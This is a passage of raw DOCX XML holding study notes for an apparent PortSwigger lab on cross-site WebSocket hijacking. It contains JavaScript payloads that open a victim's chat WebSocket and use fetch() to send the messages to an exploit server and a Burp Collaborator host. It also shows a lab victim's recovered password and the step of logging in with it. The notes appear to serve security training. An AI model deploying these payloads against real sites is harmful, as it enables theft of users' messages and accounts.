          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> = function(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1365D339" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="008C11E1" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>fetch(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">"https://exploit-0ab300300427b6c3852c489401340020.exploit-server.net/exploit/exploit?message=" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>btoa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>event.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4464F84A" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="008C11E1" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>  };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70960CC4" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="008C11E1" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4774ABE5" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0042376C" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="61F35139" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Store it and deliver to victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7FDA2A" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00647DC4" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to access log, find victim requests which are in encoded form copy it and decode to base64 using burp decoder. (only message part </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>remove</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> other content using appropriate text editor)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A907EE5" wp14:editId="746106E8">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="96183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3175" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00647DC4">
        <w:t>eyJ1c2VyIjoiSGFsIFBsaW5lIiwiY29udGVudCI6IkhlbGxvLCBob3cgY2FuIEkgaGVscD8ifQ==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E14AA9" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00647DC4" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00647DC4">
        <w:t>eyJ1c2VyIjoiWW91IiwiY29udGVudCI6IkkgZm9yZ290IG15IHBhc3N3b3JkIn0=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FA0138" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00647DC4" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00647DC4">
        <w:t>eyJ1c2VyIjoiSGFsIFBsaW5lIiwiY29udGVudCI6Ik5vIHByb2JsZW0gY2FybG9zLCBpdCZhcG9zO3MgcnA5NTh2bGk3ZXl2bGxmaWhyOHEifQ==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0DBAA6" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00647DC4" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00647DC4">
        <w:t>eyJ1c2VyIjoiWW91IiwiY29udGVudCI6IlRoYW5rcywgSSBob3BlIHRoaXMgZG9lc24mYXBvczt0IGNvbWUgYmFjayB0byBiaXRlIG1lISJ9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BE7581" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0051518A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4952EBD1" wp14:editId="0D2D7C62">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="77032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20699" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AEB1CC" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="005645B9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Username: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4604">
        <w:t>rp958vli7eyvllfihr8q</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005645B9">
        <w:t xml:space="preserve">Use the exfiltrated credentials to log in to the victim user's account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E7DA71" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B3FA25" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="6E900FCA" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="27BABAFC" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Using collaborator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A4201A" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="005645B9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005645B9">
        <w:t xml:space="preserve">Click "Live chat" and send a chat message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50705505" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="005645B9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005645B9">
        <w:t xml:space="preserve">Reload the page. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007A76EA" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="005645B9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005645B9">
        <w:t xml:space="preserve">In Burp Proxy, in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005645B9">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005645B9">
        <w:t xml:space="preserve"> history tab, observe that the "READY" command retrieves past chat messages from the server. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25096BB5" wp14:editId="7575C9C1">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="94334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7770" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7530972B" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="005645B9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005645B9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In Burp Proxy, in the HTTP history tab, find the WebSocket handshake request. Observe that the request has no CSRF tokens. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42C9EA7F" wp14:editId="5735EDDD">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="112164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47754" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6424343F" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="005645B9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005645B9">
        <w:t>Right-click on the handshake request and select "Copy URL"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OR copy from browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF5425B" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005645B9">
        <w:t xml:space="preserve">In the browser, go to the exploit server and paste the following template into the "Body" section: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFF855B" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="004F7925" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ABEE44" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="004F7925" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> = new WebSocket('wss://0a6000fc0431085b80d58aac000b006a.web-security-academy.net/chat');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E08A6F" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="004F7925" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ws.onopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>function(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462B9519" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="004F7925" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ws.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>("READY");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1103B295" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="004F7925" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E6B114" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="004F7925" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ws.onmessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> = function(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2439E4" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="004F7925" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>fetch(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>'https://ecune9lbpso05aaiemr6c2n6wx2oqee3.oastify.com', {method: 'POST', mode: 'no-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>cors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">', body: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>event.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECD8957" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="004F7925" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A9A35" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="004F7925" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="004F7925">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9AC7A8" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="005645B9" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="65EA6127" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="005645B9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL after </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is lab and fetch methods is collaborator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9E0F60" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="005645B9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005645B9">
        <w:t xml:space="preserve">Click "View exploit". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C0B988" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="005645B9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005645B9">
        <w:t xml:space="preserve">Poll for interactions in the Collaborator tab. Verify that the attack has successfully retrieved your chat history and exfiltrated it via Burp Collaborator. For every message in the chat, Burp Collaborator has received an HTTP request. The request body contains the full contents of </w:t>
      </w:r>
      <w:r w:rsidRPr="005645B9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">the chat message in JSON format. Note that these messages may not be received in the correct order. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619A605C" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="005645B9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005645B9">
        <w:t xml:space="preserve">Go back to the exploit server and deliver the exploit to the victim. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6F8DF9" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="005645B9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005645B9">
        <w:t>Poll for interactions in the Collaborator tab again. Observe that you've received more HTTP interactions containing the victim's chat history. Examine the messages and notice that one of them contains the victim's username and password.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AF32E6C" wp14:editId="6E48B7BA">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="189658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87608" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0050270C">
        <w:t xml:space="preserve">No problem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0050270C">
        <w:t>carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0050270C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0050270C">
        <w:t>it&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0050270C">
        <w:t>apos;s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0050270C">
        <w:t xml:space="preserve"> rp958vli7eyvllfi</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Username :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="0050270C">
        <w:t>rp958vli7eyvllfi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hr8q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A68085" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="005645B9" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005645B9">
        <w:t xml:space="preserve">Use the exfiltrated credentials to log in to the victim user's account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229D39EC" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="04C3D0C7" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="672D250D" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00100A75" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00100A75">
        <w:t>How to secure a WebSocket connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F35DDB" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00100A75" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00100A75">
        <w:t xml:space="preserve">To minimize the risk of security vulnerabilities arising with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00100A75">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00100A75">
        <w:t xml:space="preserve">, use the following guidelines: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1864773F" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00100A75" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00100A75">
